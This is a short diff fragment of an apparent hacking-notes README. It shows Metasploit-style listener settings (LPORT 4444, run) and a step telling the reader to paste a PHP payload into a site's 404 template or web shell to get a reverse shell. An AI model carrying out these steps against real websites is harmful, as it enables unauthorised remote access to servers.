Shubham2001Gupta/Hack_Stuff/README.md

 $ set LPORT 4444
 $ run

-3. Paste the payload.php at the 404 Tamplate
+3. Paste the payload.php in web shell to get the reverse shell
 ```